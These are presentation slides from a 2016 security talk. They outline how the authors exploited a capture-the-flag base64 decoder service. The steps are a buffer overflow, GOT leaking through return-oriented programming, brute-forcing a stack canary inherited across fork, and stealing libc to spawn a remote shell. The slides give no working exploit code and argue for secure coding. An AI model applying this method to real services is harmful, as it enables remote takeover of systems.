© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
Linux Binary Analysis and Exploitation
Dharma Ganesan, Mikael Lindvall
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
2
Context of the slides
 Gave a presentation: NASA Coding Summit
 Held at NASA’s IV&V Center
 NASA systems & context are removed in these slides
 Too sensitive for public release
 Increases the risk of attacks on those systems
 Slides meant to be a teaser on this topic
 Many low-level nitty-gritty details are left-out
 Time-restriction (only 30 min. original talk)
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
3
Keywords (used in our exploit)
 Return-Oriented Programming
 Address Space Randomization (ASLR)
 Non-Executable Stack (NX)
 Attacking a Global Offset Table (GOT)
 Stealing Remote Libc
 Stealing Stack Canary
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
4
Attack Scenarios and Our Scope
 Scenario 1: Open-source software
 E.g. Linux, Apache Web-server, etc.
 Scenario 2: Open-binary but closed source
 E.g. Most commercial products
 Scenario 3: Closed-binary and closed source
 E.g. Remote services
 Scope of this talk: Scenario 2 (remote exploit)
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
5
Questions
 Many modern operating systems (OS) have
built-in security features
 more on this later
 Is it possible to circumvent these security
features and take over a remote machine?
 Do we still have to do secure coding even
though OS has security features?
 Let’s investigate these questions for Linux
 Although highly relevant for other Oses!
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
6
Modern OS security features
(samples)
 Address Space Layout Randomization
(ASLR)
 Non-Executable Stack (NX)
 Stack Canary
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
7
ASLR feature for security
 Historically, memory addresses of variables and functions
did not change between runs
 Allows hackers to perform remote code execution easily
 Address space layout randomization (ASLR) randomizes
many items:
 Address of variables differ between runs
 (e.g. buffer addresses are difficult to predict for hackers)
 Address of shared-libraries/dlls differ between runs
 (e.g. address of library functions difficult for hackers to predict)
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
8
Non-Executable stack (NX) for
security
 Historically, hackers send exploits using the
user input buffer
 Modify the control the flow by redirecting the
control to the buffer
 Non-executable stack (NX) will not allow
code execution on stack
 If a hacker stores his exploit (e.g. virus) on a
stack, OS will not run that code
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
9
Stack Canary for security
 Historically, when hackers overflow a buffer and
modify the control flow, the OS was not aware of
this hacking event
 Stack canary (a random key) can detect this issue
 The random key generated by the runtime linker is
inserted into the stack to maintain control flow
integrity
 One cannot override the return addresses, stored on
the stack, without guessing the canary!
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
10
Questions
 Many modern operating systems (OS) have
built-in security features
 more on this later
 Is it possible to circumvent these security
features and take over a remote machine?
 Do we still have to do secure coding even
though OS has security features?
 Let’s investigate these questions for Linux
 Although highly relevant for other Oses!
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
11
High-level procedure for
analysis of binary
 Assumption: Remote service binary is available to the hacker
 but the environment is not
 Step 1: Data gathering about the target binary
 Step 2: Analyze binary for vulnerable library functions, signatures
 Step 3: Reachability analysis of vulnerable library functions
 Step 4: Memory layout analysis of the binary and remote machine
 Step 5: Stealing the remote’s Libc, the Stack Canary
 Step 6: Construct evil input that will take over the remote machine
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
12
Applying the procedure:
An example
 Context: This service is part of a capture-the-flag online
challenge (ringzero.com)
 About the remote service (base 64 decoder service):
 The remote service listens for input on a particular port
 It outputs base 64 decoding for the given input
 The binary of the remote service is available for
download
 But not the running environment such as libc libraries nor OS
 600 assembly instructions (x86-64)
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
13
Applying the procedure:
An example
 Challenge:
 Break into this remote service
 Perform remote code execution by exploiting
vulnerabilities in the binary
 Steal secrets (i.e. flag file) from the server by
reading the file system of the server
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
14
Step 1: Data gathering of the
remote service
 Tools: readelf and grep
 What is the OS, machine, and processor type of the remote service?
 dharma@ubuntu:~$ readelf -hn <binary>
 Data: 2's complement, little endian
 OS/ABI: UNIX - System V
 Machine: Advanced Micro Devices X86-64
 OS: Linux, ABI: 2.6.24
 Unfortunately, my OS version is different from the remote service
 But we will overcome this problem (discussed later)
 Is the stack executable?
 dharma@ubuntu:~/Downloads$ readelf -lW <binary>| grep GNU_STACK
 Output: GNU_STACK ... RW 0x10
 RW means the stack is read and write only but not executable
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
15
Step 1: Data gathering of the
remote service
 Is there a stack canary that will kick me out if I overflow any buffers?
 Tools used: objdump, grep
Dump of assembler code for function doprocessing:
0x0000000000400eaa <+318>: mov -0x8(%rbp),%rax
0x0000000000400eae <+322>: xor %fs:0x28,%rax
0x0000000000400eb7 <+331>: je 0x400ebe <doprocessing+338>
0x0000000000400eb9 <+333>: callq 0x400930 <__stack_chk_fail@plt>
 Stack canary is generated at runtime and stored in the fs register
 Unfortunately, there is a built-in stack integrity check
 stack_chk_fail will be called if I corrupt the stack
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
16
Step 2: Analyze the binary for
vulnerable library functions?
 Tools used: objdump and grep
 Which external functions are used?
 dharma@ubuntu:~$ objdump –R <binary>
 Output: List of library functions used by the binary
 Hunt for vulnerable functions pointed me to “fork”
 This function is not used properly (more on this later)
 No strcpy or gets usage (unlucky for the hacker)
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
17
Step 2: Analyze the binary for
vulnerable signatures?
 Is there a function in the given binary which takes two buffers as
inputs but without the length of each buffer as arguments?
 If yes, then the service may have memory safety issues
 It may be possible to overflow the buffer, modify control flow
 Searching for vulnerable signature often requires disassembly of
the binary in order to reconstruct signatures for each function
 Takes a lot of time and effort
 Found vulnerable signature: base64_decode(char*, char*);
 Disassembled function found no bounds checking of buffer sizes
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
18
Step 3: Reachability analysis
 How do reach the vulnerable signature?
 Answering this question requires
reconstructing the call graph from the binary
 For example, in the remote service
vulnerable function base64_decode is called
without bounds checking
 Great news for the hacker – stack-based
buffer overflow
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
19
Step 3: Reachability analysis:
Manually reversed C function from
binary (sample)
void doprocessing()
{
char base64Out[0x200];
char userInput[0x400];
bzero(base64Out, 0x200);
bzero(userInput, 0x400);
write(1, "Please enter your base 64 string: n", 0x23);
read(0, userInput, 0x400);
write(1, "Your message is:n", 0x11);
write(1, base64Out, base64_decode(userInput, base64Out));
/* base64_decode is not checking the decoded buffer size */
write(1, "nThank you for using ringzer0 base64 decoder!n", 0x2e);
}
• Base64_decode can corrupt the return address of doprocessing
• Remote code execution: If the base 64 decoded string exceeds the buffer size
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
20
Step 4: Memory layout analysis
 Finding the vulnerability is a small part of the puzzle
 Exploiting the vulnerability is the tricky part
 We need to understand the memory layout of the
remote service from its binary in order to do remote
code execution
 Is the address space layout randomization (ASLR)
turned on in the remote machine?
 Do answer this question: We need to find a way to
leak memory addresses from the remote machine
to our machine
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
21
Step 4: Leaking memory addresses
of the remote service
 Every Linux binary has a table called Global Offset Table (GOT)
 GOT contains pointers that will point to runtime addresses of library
functions
 Goal: Print the GOT entries of the remote service!
 We can modify the control flow of doProcessing function due to buffer
overflow
 We will overwrite the return address of doProcessing by the write
function address
 and pass a GOT entry address to appropriate registers (rsi register)
 This step is performed using Return-oriented programming (ROP)
 Running the remote service two times showed different addresses –
ASLR is ON – not easy to hack the remote server
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
22
Step 5: Stealing the remote’s Libc
 Libc is turning-complete – meaning we can construct
any algorithm from the fragments of libc
 Since the remote service is vulnerable to memory
errors, we are able to read arbitrary memory of the
remote service!
 This vulnerability allowed us to write a program that
secretly transfers the remote service’s libc binary
 This solved the problem that the remote server has a
different runtime versions of libc and GCC
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
23
Step 5: Stealing the stack canary
 The stack canary prevents remote code execution!
 Goal: Steal the stack canary by guessing 1 byte at a time
 Approach: A stack canary is 8 byte, require 8x256 guesses
 The binary has a fork-based vulnerability – a design flaw
 The parent remote service spawns a child task using the
fork syscall
 But, all child tasks inherit the same stack canary
 Thus, we wrote a program that will correctly guess the
stack canary in 8x256 attempts.
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
24
Step 6 – Constructing the evil input
that spawns a remote shell
 In our case, we want to spawn a remote shell
using the vulnerable remote service
 Using return-oriented programming (ROP) – a
hacking technique
 We wrote a program that constructs ROP
gadgets using the stolen libc
 We get a backdoor into the remote system!
 Please talk to me for more details!
 only 30 min talk
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
25
Conclusion
 Memory errors are very dangerous even if a remote
machine is running on a custom-built environment!
 Hackers can steal, reconstruct, exploit our environment
 Secure OS features are necessary but not sufficient
 We were able to defeat ASLR, NX, and Stack Canaries
 Secure coding is mandatory; OS cannot always protect us
if our coding is not secure
 One main security requirement: input validation
 Extensive off-nominal testing/verification is required!
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
26
Future work
 Our binary analysis is semi-manual
 More automation/research is needed for
binary reverse engineering
 Reachability analysis is effort intensive
 Generating a remote shell spawning evil input is the most
challenging part of exploit generation
 We have some ideas for how to do this!
© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
Linux Binary Analysis and
Exploitation
Dharma Ganesan, Mikael Lindvall
Fraunhofer Center for Experimental Software Engineering
College Park, Maryland, USA
{dganesan, mlindvall}@fc-md.umd.edu